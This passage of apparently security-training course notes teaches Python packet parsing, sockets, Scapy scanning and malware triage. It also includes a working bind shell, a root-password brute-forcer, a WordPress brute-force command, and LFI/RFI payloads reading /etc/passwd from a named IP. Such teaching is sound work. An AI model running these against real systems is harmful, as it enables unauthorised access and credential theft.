  1094.             events.append({'event_id' : int(event_id), 'event_name' : 'Name not found...'})
  1095.         count += 1
  1096.     except:
  1097.         continue
  1098. events = sorted(events, key=itemgetter('event_id'))
  1099. for e in events:
  1100.     print e
  1101. sys.exit('...Search Complete...')
  1102.  
  1103.  
  1104.  
  1105.  
  1106.  
  1107.  
  1108.  
  1109.  
  1110.  
  1111. #################################################
  1112. # Lesson 18: Parsing Packets with Python's DPKT #
  1113. #################################################
  1114. The first thing that you will need to do is install dpkt.
  1115.  
  1116. sudo apt-get install -y python-dpkt
  1117.  
  1118.  
  1119.  
  1120.  
  1121. Now cd to your courseware directory, and the cd into the subfolder '2-PCAP-Parsing/Resources'.
  1122. Run tcpdump to capture a .pcap file that we will use for the next exercise
  1123.  
  1124.  
  1125. sudo tcpdump -ni eth0 -s0 -w quick.pcap
  1126.  
  1127.  
  1128. --open another command prompt--
  1129. wget http://packetlife.net/media/library/12/tcpdump.pdf
  1130.  
  1131.  
  1132. Let's do something simple:
  1133.  
  1134.  
  1135. vi quickpcap.py
  1136. --------------------------------------------------------
  1137.  
  1138. #!/usr/bin/python
  1139. import dpkt;
  1140.  
  1141. # Simple script to read the timestamps in a pcap file
  1142. # Reference: http://superbabyfeng.blogspot.com/2009/05/dpkt-tutorial-0-simple-example-how-to.html
  1143.  
  1144. f = open("quick.pcap","rb")
  1145. pcap = dpkt.pcap.Reader(f)
  1146.  
  1147. for ts, buf in pcap:
  1148.     print ts;
  1149.  
  1150. f.close();
  1151.  
  1152.  
  1153. --------------------------------------------------------
  1154.  
  1155. Now let's run the script we just wrote
  1156.  
  1157.  
  1158. python quickpcap.py
  1159.  
  1160.  
  1161.  
  1162.  
  1163. How dpkt breaks down a packet:
  1164.  
  1165. Reference:
  1166. http://superbabyfeng.blogspot.com/2009/05/dpkt-tutorial-1-dpkt-sub-modules.html
  1167.  
  1168.     src: the MAC address of SOURCE.
  1169.     dst: The MAC address of DESTINATION
  1170.     type: The protocol type of contained ethernet payload.
  1171.  
  1172. The allowed values are listed in the file "ethernet.py",
  1173. such as:
  1174. a) ETH_TYPE_IP: It means that the ethernet payload is IP layer data.
  1175. b) ETH_TYPE_IPX: Means that the ethernet payload is IPX layer data.
  1176.  
  1177.  
  1178. References:
  1179. http://stackoverflow.com/questions/6337878/parsing-pcap-files-with-dpkt-python
  1180.  
  1181.  
  1182.  
  1183.  
  1184.  
  1185.  
  1186. Ok - now let's have a look at pcapparsing.py
  1187.  
  1188. sudo tcpdump -ni eth0 -s0 -w capture-100.pcap
  1189.  
  1190.  
  1191. --open another command prompt--
  1192. wget http://packetlife.net/media/library/13/Wireshark_Display_Filters.pdf
  1193.  
  1194.  
  1195.  
  1196. Ok - now let's have a look at pcapparsing.py
  1197. --------------------------------------------------------
  1198.  
  1199. import socket
  1200. import dpkt
  1201. import sys
  1202. f = open('capture-100.pcap','r')
  1203. pcapReader = dpkt.pcap.Reader(f)
  1204.  
  1205. for ts,data in pcapReader:
  1206.     ether = dpkt.ethernet.Ethernet(data)
  1207.     if ether.type != dpkt.ethernet.ETH_TYPE_IP: raise
  1208.     ip = ether.data
  1209.     tcp = ip.data
  1210.     src = socket.inet_ntoa(ip.src)
  1211.     srcport = tcp.sport
  1212.     dst = socket.inet_ntoa(ip.dst)
  1213.     dstport = tcp.dport
  1214.     print "src: %s (port : %s)-> dest: %s (port %s)" % (src,srcport ,dst,dstport)
  1215.  
  1216. f.close()
  1217.  
  1218. --------------------------------------------------------
  1219.  
  1220.  
  1221.  
  1222. OK - let's run it:
  1223. python pcapparsing.py
  1224.  
  1225.  
  1226.  
  1227. running this script might throw an error like this:
  1228.  
  1229. Traceback (most recent call last):
  1230.  File "pcapparsing.py", line 9, in <module>
  1231.    if ether.type != dpkt.ethernet.ETH_TYPE_IP: raise
  1232.  
  1233.  
  1234. If it does it is just because your packet has something in it that we didn't specify (maybe ICMP, or something)
  1235.  
  1236.  
  1237.  
  1238.  
  1239. Your homework for today...
  1240.  
  1241.  
  1242. Rewrite this pcapparsing.py so that it prints out the timestamp, the source and destination IP addresses, and the source and destination ports.
  1243.  
  1244.  
  1245.  
  1246.  
  1247.  
  1248.  
  1249. Your challenge is to fix the Traceback error
  1250.  
  1251.  
  1252.  
  1253.  
  1254. #!/usr/bin/python
  1255.  
  1256. import pcapy
  1257. import dpkt
  1258. import sys
  1259. import socket
  1260. import struct
  1261.  
  1262. SINGLE_SHOT = False
  1263.  
  1264. # list all the network devices
  1265. pcapy.findalldevs()
  1266.  
  1267. iface = "eth0"
  1268. filter = "arp"
  1269. max_bytes = 1024
  1270. promiscuous = False
  1271. read_timeout = 100 # in milliseconds
  1272.  
  1273. pc = pcapy.open_live( iface, max_bytes, promiscuous, read_timeout )
  1274. pc.setfilter( filter )
  1275.  
  1276. # callback for received packets
  1277. def recv_pkts( hdr, data ):
  1278.     packet = dpkt.ethernet.Ethernet( data )
  1279.  
  1280.     print type( packet.data )
  1281.     print "ipsrc: %s, ipdst: %s" %( \
  1282.                  socket.inet_ntoa( packet.data.spa ), \
  1283.                  socket.inet_ntoa( packet.data.tpa ) )
  1284.  
  1285.     print "macsrc: %s, macdst: %s " % (
  1286.                 "%x:%x:%x:%x:%x:%x" % struct.unpack("BBBBBB",packet.data.sha),
  1287.                 "%x:%x:%x:%x:%x:%x" % struct.unpack("BBBBBB",packet.data.tha ) )
  1288.  
  1289. if SINGLE_SHOT:
  1290.     header, data = pc.next()
  1291.     sys.exit(0)
  1292. else:
  1293.     packet_limit = -1 # infinite
  1294.     pc.loop( packet_limit, recv_pkts ) # capture packets
  1295.  
  1296.  
  1297.  
  1298.  
  1299.  
  1300.  
  1301.  
  1302.  
  1303. #############################
  1304. # Reference Videos To Watch #
  1305. #############################
  1306. Here is your second set of youtube videos that I'd like for you to watch:
  1307. https://www.youtube.com/playlist?list=PLEA1FEF17E1E5C0DA (watch videos 11-20)
  1308.  
  1309.  
  1310.  
  1311.  
  1312. #############################################
  1313. # Lesson 19: Python Sockets & Port Scanning #
  1314. #############################################
  1315.  
  1316.  
  1317. $ ncat -l -v -p 1234
  1318.  
  1319.  
  1320.  
  1321.  
  1322. --open another terminal--
  1323. python
  1324.  
  1325. >>> import socket
  1326. >>> s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  1327. >>> s.connect(('localhost', 1234))
  1328. >>> s.send('Hello, world')
  1329. >>> data = s.recv(1024)
  1330. >>> s.close()
  1331.  
  1332. >>> print 'Received', 'data'
  1333.  
  1334.  
  1335.  
  1336.  
  1337.  
  1338.  
  1339. ########################################
  1340. # Lesson 20: TCP Client and TCP Server #
  1341. ########################################
  1342.  
  1343. vi tcpclient.py
  1344.  
  1345.  
  1346.  
  1347. #!/usr/bin/python
  1348. # tcpclient.py
  1349.  
  1350. import socket
  1351.  
  1352. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  1353. hostport = ("127.0.0.1", 1337)
  1354. s.connect(hostport)
  1355. s.send("Hello\n")
  1356. buf = s.recv(1024)
  1357. print "Received", buf
  1358.  
  1359.  
  1360.  
  1361.  
  1362.  
  1363.  
  1364.  
  1365.  
  1366.  
  1367. vi tcpserver.py
  1368.  
  1369.  
  1370.  
  1371.  
  1372.  
  1373. #!/usr/bin/python
  1374. # tcpserver.py
  1375.  
  1376. import socket
  1377.  
  1378. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  1379. hostport = ("", 1337)
  1380. s.bind(hostport)
  1381. s.listen(10)
  1382. while 1:
  1383.     cli,addr = s.accept()
  1384.     print "Connection from", addr
  1385.     buf = cli.recv(1024)
  1386.     print "Received", buf
  1387.     if buf == "Hello\n":
  1388.         cli.send("Server ID 1\n")
  1389.     cli.close()
  1390.  
  1391.  
  1392.  
  1393.  
  1394.  
  1395.  
  1396.  
  1397.  
  1398. python tcpserver.py
  1399.  
  1400.  
  1401. --open another terminal--
  1402. python tcpclient.py
  1403.  
  1404.  
  1405. ########################################
  1406. # Lesson 21: UDP Client and UDP Server #
  1407. ########################################
  1408.  
  1409. vi udpclient.py
  1410.  
  1411.  
  1412.  
  1413.  
  1414.  
  1415.  
  1416. #!/usr/bin/python
  1417. # udpclient.py
  1418.  
  1419. import socket
  1420.  
  1421. s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
  1422. hostport = ("127.0.0.1", 1337)
  1423. s.sendto("Hello\n", hostport)
  1424. buf = s.recv(1024)
  1425. print buf
  1426.  
  1427.  
  1428.  
  1429.  
  1430.  
  1431.  
  1432.  
  1433.  
  1434.  
  1435. vi udpserver.py
  1436.  
  1437.  
  1438.  
  1439.  
  1440.  
  1441.  
  1442. #!/usr/bin/python
  1443. # udpserver.py
  1444.  
  1445. import socket
  1446.  
  1447. s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
  1448. hostport = ("127.0.0.1", 1337)
  1449. s.bind(hostport)
  1450. while 1:
  1451.     buf, address = s.recvfrom(1024)
  1452.     print buf
  1453.     if buf == "Hello\n":
  1454.         s.sendto("Server ID 1\n", address)
  1455.  
  1456.  
  1457.  
  1458.  
  1459.  
  1460.  
  1461. python udpserver.py
  1462.  
  1463.  
  1464. --open another terminal--
  1465. python udpclient.py
  1466.  
  1467.  
  1468.  
  1469.  
  1470.  
  1471.  
  1472. ###############################
  1473. # Lesson 22: Installing Scapy #
  1474. ###############################
  1475.  
  1476. sudo apt-get update
  1477. sudo apt-get install python-scapy python-pyx python-gnuplot
  1478.  
  1479.  
  1480. Reference Page For All Of The Commands We Will Be Running:
  1481. http://samsclass.info/124/proj11/proj17-scapy.html
  1482.  
  1483. Great slides for Scapy:
  1484. http://www.secdev.org/conf/scapy_csw05.pdf
  1485.  
  1486.  
  1487.  
  1488.  
  1489. To run Scapy interactively
  1490.  
  1491.     sudo scapy
  1492.  
  1493.  
  1494.  
  1495. ################################################
  1496. # Lesson 23: Sending ICMPv4 Packets with scapy #
  1497. ################################################
  1498.  
  1499. In the Linux machine, in the Terminal window, at the >>> prompt, type this command, and then press the Enter key:
  1500.  
  1501.    i = IP()
  1502.  
  1503.  
  1504.  
  1505.  
  1506. This creates an object named i of type IP. To see the properties of that object, use the display() method with this command:
  1507.  
  1508.    i.display()
  1509.  
  1510.  
  1511.  
  1512.  
  1513. Use these commands to set the destination IP address and display the properties of the i object again. Replace the IP address in the first command with the IP address of your target Windows machine:
  1514.  
  1515.    i.dst="10.65.75.49"
  1516.  
  1517.    i.display()
  1518.  
  1519.  
  1520.  
  1521.  
  1522. Notice that scapy automatically fills in your machine's source IP address.
  1523.  
  1524. Use these commands to create an object named ic of type ICMP and display its properties:
  1525.  
  1526.  
  1527.     ic = ICMP()
  1528.  
  1529.     ic.display()
  1530.  
  1531.  
  1532.  
  1533.  
  1534.  
  1535. Use this command to send the packet onto the network and listen to a single packet in response. Note that the third character is the numeral 1, not a lowercase L:
  1536.  
  1537.     sr1(i/ic)
  1538.  
  1539.  
  1540.  
  1541.  
  1542.  
  1543. This command sends and receives one packet, of type IP at layer 3 and ICMP at layer 4. As you can see in the image above, the response is shown, with ICMP type echo-reply.
  1544.  
  1545. The Padding section shows the portion of the packet that carries higher-level data. In this case it contains only zeroes as padding.
  1546.  
  1547. Use this command to send a packet that is IP at layer 3, ICMP at layer 4, and that contains data with your name in it (replace YOUR NAME with your own name):
  1548.  
  1549.  
  1550.     sr1(i/ic/"YOUR NAME")
  1551.  
  1552.  
  1553. You should see a reply with a Raw section containing your name.
  1554.  
  1555.  
  1556.  
  1557. ##############################################
  1558. # Lesson 24: Sending a UDP Packet with Scapy #
  1559. ##############################################
  1560.  
  1561.  
  1562. Preparing the Target
  1563. $ ncat -ulvp 4444
  1564.  
  1565.  
  1566.  
  1567.  
  1568. --open another terminal--
  1569. In the Linux machine, in the Terminal window, at the >>> prompt, type these commands, and then press the Enter key:
  1570.  
  1571.     u = UDP()
  1572.  
  1573.     u.display()
  1574.  
  1575.  
  1576.  
  1577. This creates an object named u of type UDP, and displays its properties.
  1578.  
  1579. Execute these commands to change the destination port to 4444 and display the properties again:
  1580.  
  1581.     i.dst="10.10.2.97"              <--- replace this with a host that you can run netcat on (ex: another VM or your host computer)
  1582.  
  1583.     u.dport = 4444
  1584.  
  1585.     u.display()
  1586.  
  1587.  
  1588.  
  1589. Execute this command to send the packet to the Windows machine:
  1590.  
  1591.     send(i/u/"YOUR NAME SENT VIA UDP\n")
  1592.  
  1593.  
  1594.  
  1595. On the Windows target, you should see the message appear
  1596.  
  1597.  
  1598.  
  1599.  
  1600. #######################################
  1601. # Lesson 25: Ping Sweeping with Scapy #
  1602. #######################################
  1603.  
  1604.  
  1605.  
  1606. #!/usr/bin/python
  1607. from scapy.all import *
  1608.  
  1609. TIMEOUT = 2
  1610. conf.verb = 0
  1611. for ip in range(0, 256):
  1612.     packet = IP(dst="10.10.30." + str(ip), ttl=20)/ICMP()
  1613.     reply = sr1(packet, timeout=TIMEOUT)
  1614.     if not (reply is None):
  1615.          print reply.dst, "is online"
  1616.     else:
  1617.          print "Timeout waiting for %s" % packet[IP].dst
  1618.  
  1619.  
  1620.  
  1621. ###############################################
  1622. # Checking out some scapy based port scanners #
  1623. ###############################################
  1624.  
  1625. wget https://s3.amazonaws.com/SecureNinja/Python/rdp_scan.py
  1626.  
  1627. cat rdp_scan.py
  1628.  
  1629. sudo python rdp_scan.py 10.10.30.250
  1630.  
  1631.  
  1632.  
  1633. ######################################
  1634. # Dealing with conf.verb=0 NameError #
  1635. ######################################
  1636.  
  1637. conf.verb = 0
  1638. NameError: name 'conf' is not defined
  1639.  
  1640. Fixing scapy - some scripts are written for the old version of scapy so you'll have to change the following line from:
  1641.  
  1642. from scapy import *
  1643.     to
  1644. from scapy.all import *
  1645.  
  1646.  
  1647.  
  1648. Reference:
  1649. http://hexale.blogspot.com/2008/10/wifizoo-and-new-version-of-scapy.html
  1650.  
  1651.  
  1652. conf.verb=0 is a verbosity setting (configuration/verbosity = conv
  1653.  
  1654.  
  1655.  
  1656. Here are some good Scapy references:
  1657. http://www.secdev.org/projects/scapy/doc/index.html
  1658. http://resources.infosecinstitute.com/port-scanning-using-scapy/
  1659. http://www.hackerzvoice.net/ouah/blackmagic.txt
  1660. http://www.workrobot.com/sansfire2009/SCAPY-packet-crafting-reference.html
  1661.  
  1662.  
  1663. ######################################
  1664. # Lesson 26: Bind and Reverse Shells #
  1665. ######################################
  1666. vi simplebindshell.py
  1667.  
  1668.  
  1669. #!/bin/python
  1670. import os,sys,socket
  1671.  
  1672. ls = socket.socket(socket.AF_INET,socket.SOCK_STREAM);
  1673. print '-Creating socket..'
  1674. port = 31337
  1675. try:
  1676.     ls.bind(('', port))
  1677.     print '-Binding the port on '
  1678.     ls.listen(1)
  1679.     print '-Listening, '
  1680.     (conn, addr) = ls.accept()
  1681.     print '-Waiting for connection...'
  1682.     cli= conn.fileno()
  1683.     print '-Redirecting shell...'
  1684.     os.dup2(cli, 0)
  1685.     print 'In, '
  1686.     os.dup2(cli, 1)
  1687.     print 'Out, '
  1688.     os.dup2(cli, 2)
  1689.     print 'Err'
  1690.     print 'Done!'
  1691.     arg0='/bin/sh'
  1692.     arg1='-a'
  1693.     args=[arg0]+[arg1]
  1694.     os.execv(arg0, args)
  1695. except(socket.error):
  1696.     print 'fail\n'
  1697.     conn.close()
  1698.     sys.exit(1)
  1699.  
  1700.  
  1701.  
  1702.  
  1703.  
  1704.  
  1705.  
  1706. nc TARGETIP 31337
  1707.  
  1708.  
  1709.  
  1710. ---------------------
  1711. Preparing the target for a reverse shell
  1712. $ ncat -lvp 4444
  1713.  
  1714.  
  1715.  
  1716. --open another terminal--
  1717. wget https://www.trustedsec.com/files/simple_py_shell.py
  1718.  
  1719. vi simple_py_shell.py
  1720.  
  1721.  
  1722.  
  1723.  
  1724.  
  1725.  
  1726. -------------------------------
  1727. Tricky shells
  1728.  
  1729. Reference:
  1730. http://securityweekly.com/2011/10/python-one-line-shell-code.html
  1731. http://resources.infosecinstitute.com/creating-undetectable-custom-ssh-backdoor-python-z/
  1732.  
  1733.  
  1734.  
  1735.  
  1736.  
  1737.  
  1738. #############################
  1739. # Reference Videos To Watch #
  1740. #############################
  1741. Here is your third set of youtube videos that I'd like for you to watch:
  1742. https://www.youtube.com/playlist?list=PLEA1FEF17E1E5C0DA (watch videos 21-30)
  1743.  
  1744.  
  1745.  
  1746.  
  1747. #################################################
  1748. # Lesson 27: Python Functions & String Handling #
  1749. #################################################
  1750.  
  1751. Python can make use of functions:
  1752. http://www.tutorialspoint.com/python/python_functions.htm
  1753.  
  1754.  
  1755.  
  1756. Python can interact with the 'crypt' function used to create Unix passwords:
  1757. http://docs.python.org/2/library/crypt.html
  1758.  
  1759.  
  1760.  
  1761. Tonight we will see a lot of the split() method so be sure to keep the following references close by:
  1762. http://www.tutorialspoint.com/python/string_split.htm
  1763.  
  1764.  
  1765. Tonight we will see a lot of slicing so be sure to keep the following references close by:
  1766. http://techearth.net/python/index.php5?title=Python:Basics:Slices
  1767.  
  1768.  
  1769.  
  1770.  
  1771.  
  1772. ################################
  1773. # Lesson 28: Password Cracking #
  1774. ################################
  1775.  
  1776. wget https://s3.amazonaws.com/SecureNinja/Python/htcrack.py
  1777.  
  1778. vi htcrack.py
  1779.  
  1780. vi list.txt
  1781.  
  1782. hello
  1783. goodbye
  1784. red
  1785. blue
  1786. yourname
  1787. tim
  1788. bob
  1789.  
  1790.  
  1791. htpasswd -nd yourname
  1792.     - enter yourname as the password
  1793.  
  1794.  
  1795.  
  1796. python htcrack.py joe:7XsJIbCFzqg/o list.txt
  1797.  
  1798.  
  1799.  
  1800.  
  1801. sudo apt-get install -y python-mechanize python-pexpect python-pexpect-doc
  1802.  
  1803. rm -rf mechanize-0.2.5.tar.gz
  1804.  
  1805. sudo /bin/bash
  1806.  
  1807. passwd
  1808.     ***set root password***
  1809.  
  1810.  
  1811.  
  1812.  
  1813. vi rootbrute.py
  1814.  
  1815.  
  1816. #!/usr/bin/env python
  1817.  
  1818. import sys
  1819. try:
  1820.         import pexpect
  1821. except(ImportError):
  1822.         print "\nYou need the pexpect module."
  1823.         print "http://www.noah.org/wiki/Pexpect\n"
  1824.         sys.exit(1)
  1825.  
  1826. #Change this if needed.
  1827. # LOGIN_ERROR = 'su: incorrect password'
  1828. LOGIN_ERROR = "su: Authentication failure"
  1829.  
  1830. def brute(word):
  1831.         print "Trying:",word
  1832.         child = pexpect.spawn('/bin/su')
  1833.         child.expect('Password: ')
  1834.         child.sendline(word)
  1835.         i = child.expect (['.+\s#\s',LOGIN_ERROR, pexpect.TIMEOUT],timeout=3)
  1836.         if i == 1:
  1837.                 print "Incorrect Password"
  1838.  
  1839.         if i == 2:
  1840.                 print "\n\t[!] Root Password:" ,word
  1841.                 child.sendline ('id')
  1842.                 print child.before
  1843.                 child.interact()
  1844.  
  1845. if len(sys.argv) != 2:
  1846.         print "\nUsage : ./rootbrute.py <wordlist>"
  1847.         print "Eg: ./rootbrute.py words.txt\n"
  1848.         sys.exit(1)
  1849.  
  1850. try:
  1851.         words = open(sys.argv[1], "r").readlines()
  1852. except(IOError):
  1853.         print "\nError: Check your wordlist path\n"
  1854.         sys.exit(1)
  1855.  
  1856. print "\n[+] Loaded:",len(words),"words"
  1857. print "[+] BruteForcing...\n"
  1858. for word in words:
  1859.         brute(word.replace("\n",""))
  1860.  
  1861.  
  1862.  
  1863.  
  1864. References you might find helpful:
  1865. http://stackoverflow.com/questions/15026536/looping-over-a-some-ips-from-a-file-in-python
  1866.  
  1867.  
  1868.  
  1869.  
  1870.  
  1871.  
  1872.  
  1873.  
  1874.  
  1875. wget https://s3.amazonaws.com/SecureNinja/Python/md5crack.py
  1876.  
  1877. vi md5crack.py
  1878.  
  1879.  
  1880.  
  1881.  
  1882.  
  1883.  
  1884. Why use hexdigest
  1885. http://stackoverflow.com/questions/3583265/compare-result-from-hexdigest-to-a-string
  1886.  
  1887.  
  1888.  
  1889.  
  1890. http://md5online.net/
  1891.  
  1892.  
  1893.  
  1894.  
  1895.  
  1896.  
  1897.  
  1898. wget https://s3.amazonaws.com/SecureNinja/Python/wpbruteforcer.py
  1899.  
  1900.  
  1901.  
  1902.  
  1903. #############################
  1904. # Reference Videos To Watch #
  1905. #############################
  1906. Here is your forth set of youtube videos that I'd like for you to watch:
  1907. https://www.youtube.com/playlist?list=PLEA1FEF17E1E5C0DA (watch videos 31-40)
  1908.  
  1909.  
  1910.  
  1911.  
  1912.  
  1913. ######################
  1914. # Lesson 29: Web App #
  1915. ######################
  1916. vi wpbruteforcer.py
  1917.  
  1918.  
  1919. python wpbruteforcer.py -t strategicsec.com -u j0e -w list.txt
  1920.  
  1921.  
  1922.  
  1923. - Here is an example of an LFI
  1924. - Open this page in Firefox:
  1925. http://54.186.248.116/showfile.php?filename=contactus.txt
  1926.  
  1927. - Notice the page name (showfile.php) and the parameter name (filename) and the filename (contactus.txt)
  1928. - Here you see a direct reference to a file on the local filesystem of the victim machine.
  1929. - You can attack this by doing the following:
  1930. http://54.186.248.116/showfile.php?filename=/etc/passwd
  1931.  
  1932. - This is an example of a Local File Include (LFI), to change this attack into a Remote File Include (RFI) you need some content from
  1933. - somewhere else on the Internet. Here is an example of a text file on the web:
  1934. http://www.opensource.apple.com/source/SpamAssassin/SpamAssassin-127.2/SpamAssassin/t/data/etc/hello.txt
  1935.  
  1936. - Now we can attack the target via RFI like this:
  1937. http://54.186.248.116/showfile.php?filename=http://www.opensource.apple.com/source/SpamAssassin/SpamAssassin-127.2/SpamAssassin/t/data/etc/hello.txt
  1938.  
  1939.  
  1940. - Now let's see if we can write some code to do this for us:
  1941.  
  1942. vi LFI-RFI.py
  1943.  
  1944.  
  1945.  
  1946. #!/usr/bin/env python
  1947. print "\n### PHP LFI/RFI Detector ###"
  1948. print "### Sean Arries 09/18/09 ###\n"
  1949.  
  1950. import urllib2,re,sys
  1951.  
  1952.  
  1953. TARGET = "http://54.186.248.116/showfile.php?filename=contactus.txt"
  1954. RFIVULN = "http://www.opensource.apple.com/source/SpamAssassin/SpamAssassin-127.2/SpamAssassin/t/data/etc/hello.txt?"
  1955. TravLimit = 12
  1956.  
  1957. print "==> Testing for LFI vulns.."
  1958. TARGET = TARGET.split("=")[0]+"=" ## URL MANUPLIATION
  1959. for x in xrange(1,TravLimit): ## ITERATE THROUGH THE LOOP
  1960.     TARGET += "../"
  1961.     try:
  1962.         source = urllib2.urlopen((TARGET+"etc/passwd")).read() ## WEB REQUEST
  1963.     except urllib2.URLError, e:
  1964.         print "$$$ We had an Error:",e
  1965.         sys.exit(0)
  1966.     if re.search("root:x:0:0:",source): ## SEARCH FOR TEXT IN SOURCE
  1967.         print "!! ==> LFI Found:",TARGET+"etc/passwd"
  1968.         break ## BREAK LOOP WHEN VULN FOUND
  1969.  
  1970. print "\n==> Testing for RFI vulns.."
  1971. TARGET = TARGET.split("=")[0]+"="+RFIVULN ## URL MANUPLIATION
  1972. try:
  1973.     source = urllib2.urlopen(TARGET).read() ## WEB REQUEST
  1974. except urllib2.URLError, e:
  1975.     print "$$$ We had an Error:",e
  1976.     sys.exit(0)
  1977. if re.search("j0e",source): ## SEARCH FOR TEXT IN SOURCE
  1978.     print "!! => RFI Found:",TARGET
  1979.  
  1980.  
  1981. print "\nScan Complete\n" ## DONE
  1982.  
  1983.  
  1984.  
  1985.  
  1986. ###############################
  1987. # Lesson 30: Malware Analysis #
  1988. ###############################
  1989. This is actual Malware (remmeber to run it in a VM - the password to extract it is 'infected':
  1990. wget https://s3.amazonaws.com/StrategicSec-Files/MalwareAnalysis/malware-password-is-infected.zip
  1991. wget http://www.beenuarora.com/code/analyse_malware.py
  1992.  
  1993. unzip malware-password-is-infected.zip
  1994.     infected
  1995.  
  1996. file malware.exe
  1997.  
  1998. mv malware.exe malware.pdf
  1999.  
  2000. file malware.pdf
  2001.  
  2002. mv malware.pdf malware.exe
  2003.  
  2004. hexdump -n 2 -C malware.exe
  2005.  
  2006. ***What is '4d 5a' or 'MZ'***
  2007. Reference: http://www.garykessler.net/library/file_sigs.html
  2008.  
  2009.  
  2010. objdump -x malware.exe
  2011.  
  2012. strings malware.exe
  2013.  
  2014. strings --all malware.exe | head -n 6
  2015.  
  2016. strings malware.exe | grep -i dll
  2017.  
  2018. strings malware.exe | grep -i library
  2019.  
  2020. strings malware.exe | grep -i reg
  2021.  
  2022. strings malware.exe | grep -i hkey
  2023.  
  2024. strings malware.exe | grep -i hku
  2025.  
  2026.                             - We didn't see anything like HKLM, HKCU or other registry type stuff
  2027.  
  2028. strings malware.exe | grep -i irc
  2029.  
  2030. strings malware.exe | grep -i join         
  2031.  
  2032. strings malware.exe | grep -i admin
  2033.  
  2034. strings malware.exe | grep -i list
  2035.  
  2036.  
  2037.                             - List of IRC commands: https://en.wikipedia.org/wiki/List_of_Internet_Relay_Chat_commands
  2038. sudo apt-get install -y python-pefile
  2039.  
  2040. vi analyse_malware.py
  2041.  
  2042. python analyse_malware.py malware.exe
  2043.  
  2044.  
  2045. Here is a 2 million sample malware DB created by Derek Morton that you can use to start your DB with:
  2046. http://derekmorton.name/files/malware_12-14-12.sql.bz2
  2047.  
  2048.  
  2049. Malware Repositories:
  2050. http://malshare.com/index.php
  2051. http://www.malwareblacklist.com/
  2052. http://www.virusign.com/
  2053. http://virusshare.com/
  2054. http://www.tekdefense.com/downloads/malware-samples/
  2055.  
  2056. ##########################################
  2057. # Lesson 31: Creating a Malware Database #
  2058. ##########################################
  2059.  
  2060. Creating a malware database (sqlite)
  2061. ------------------------------------
  2062. wget https://malwarecookbook.googlecode.com/svn/trunk/4/4/avsubmit.py
  2063. wget https://s3.amazonaws.com/StrategicSec-Files/MalwareAnalysis/malware-password-is-infected.zip
  2064. unzip malware-password-is-infected.zip
  2065.     infected
  2066. python avsubmit.py --init
  2067. python avsubmit.py -f malware.exe -e
  2068.  
  2069.  
  2070.  
  2071.  
  2072.  
  2073. Creating a malware database (mysql)
  2074. -----------------------------------
  2075. Step 1: Installing MySQL database
  2076. Run the following command in the terminal:
  2077.  
  2078. sudo apt-get install mysql-server
  2079.      
  2080. Step 2: Installing Python MySQLdb module
  2081. Run the following command in the terminal:
  2082.  
  2083. sudo apt-get build-dep python-mysqldb
  2084. sudo apt-get install python-mysqldb
  2085.  
  2086. Step 3: Logging in
  2087. Run the following command in the terminal:
  2088.  
  2089. mysql -u root -p                    (set a password of 'malware')
  2090.  
  2091. Then create one database by running following command:
  2092.  
  2093. create database malware;
  2094.  
  2095.  
  2096.  
  2097. wget https://raw.githubusercontent.com/dcmorton/MalwareTools/master/mal_to_db.py
  2098.  
  2099. vi mal_to_db.py -i          (fill in database connection information)
  2100.  
  2101. python mal_to_db.py -i
  2102.  
  2103. python mal_to_db.py -i -f malware.exe -u
  2104.  
  2105.  
  2106. mysql -u root -p
  2107.     malware
  2108.  
  2109. mysql> use malware;
  2110.  
  2111. select id,md5,sha1,sha256,time FROM files;
  2112.  
  2113. mysql> quit;
  2114.  
  2115.  
  2116.  
  2117.  
  2118.  
  2119. ##############################
  2120. # Lesson 32: Setting up Yara #
  2121. ##############################
  2122.  
  2123.  
  2124. sudo apt-get install clamav clamav-freshclam
  2125.  
  2126. sudo freshclam
  2127.  
  2128. sudo Clamscan
  2129.  
  2130. sudo apt-get install libpcre3 libpcre3-dev
  2131.  
  2132. wget https://github.com/plusvic/yara/archive/v3.1.0.tar.gz
  2133.  
  2134. wget http://yara-project.googlecode.com/files/yara-python-1.4.tar.gz
  2135.  
  2136. tar -zxvf v3.1.0.tar.gz
  2137.  
  2138. cd yara-3.1.0/
  2139.  
  2140. ./bootstrap.sh
  2141.  
  2142. ./configure
  2143.  
  2144. make
  2145.  
  2146. make check
  2147.  
  2148. sudo make install
  2149.  
  2150. cd yara-python/
  2151.  
  2152. python setup.py build
  2153.  
  2154. sudo python setup.py install
  2155.  
  2156. cd ..
  2157.  
  2158. yara -v
  2159.  
  2160. wget https://malwarecookbook.googlecode.com/svn-history/r5/trunk/3/3/clamav_to_yara.py
  2161.  
  2162. sigtool -u /var/lib/clamav/main.cvd
  2163.  
  2164. python clamav_to_yara.py -f main.ndb -o clamav.yara
  2165.  
  2166. wget https://s3.amazonaws.com/StrategicSec-Files/MalwareAnalysis/malware-password-is-infected.zip
  2167.  
  2168. unzip malware-password-is-infected.zip
  2169.     infected
  2170.  
  2171. mkdir malcode/
  2172.  
  2173. mv malware.exe malcode/
  2174.  
  2175. vi testrule.yara
  2176. ----------------
  2177. rule IsPE
  2178. {
  2179.    meta:                                        
  2180.        description = "Windows executable file"
  2181.  
  2182.    condition:
  2183.        // MZ signature at offset 0 and ...
  2184.        uint16(0) == 0x5A4D and
  2185.        // ... PE signature at offset stored in MZ header at 0x3C
  2186.        uint32(uint32(0x3C)) == 0x00004550
  2187. }
  2188.  
  2189. rule has_no_DEP
  2190. {
  2191.    meta:
  2192.        description = "DEP is not enabled"
  2193.  
  2194.    condition:
  2195.        IsPE and
  2196.        uint16(uint32(0x3C)+0x5E) & 0x00100 == 0
  2197. }
  2198.  
  2199. rule has_no_ASLR
  2200. {
  2201.    meta:
  2202.        description = "ASLR is not enabled"
  2203.  
  2204.    condition:
  2205.        IsPE and
  2206.        uint16(uint32(0x3C)+0x5E) & 0x0040 == 0
  2207. }
  2208. ----------------
  2209.  
  2210.  
  2211. yara testrule.yara malcode/malware.exe
  2212.  
  2213. mkdir rules/
  2214.  
  2215. cd rules/
  2216.  
  2217. wget https://malwarecookbook.googlecode.com/svn-history/r5/trunk/3/5/capabilities.yara
  2218.  
  2219. wget https://malwarecookbook.googlecode.com/svn-history/r5/trunk/3/6/magic.yara
  2220.  
  2221. wget https://malwarecookbook.googlecode.com/svn-history/r5/trunk/3/4/packer.yara
  2222.  
  2223. cd ..
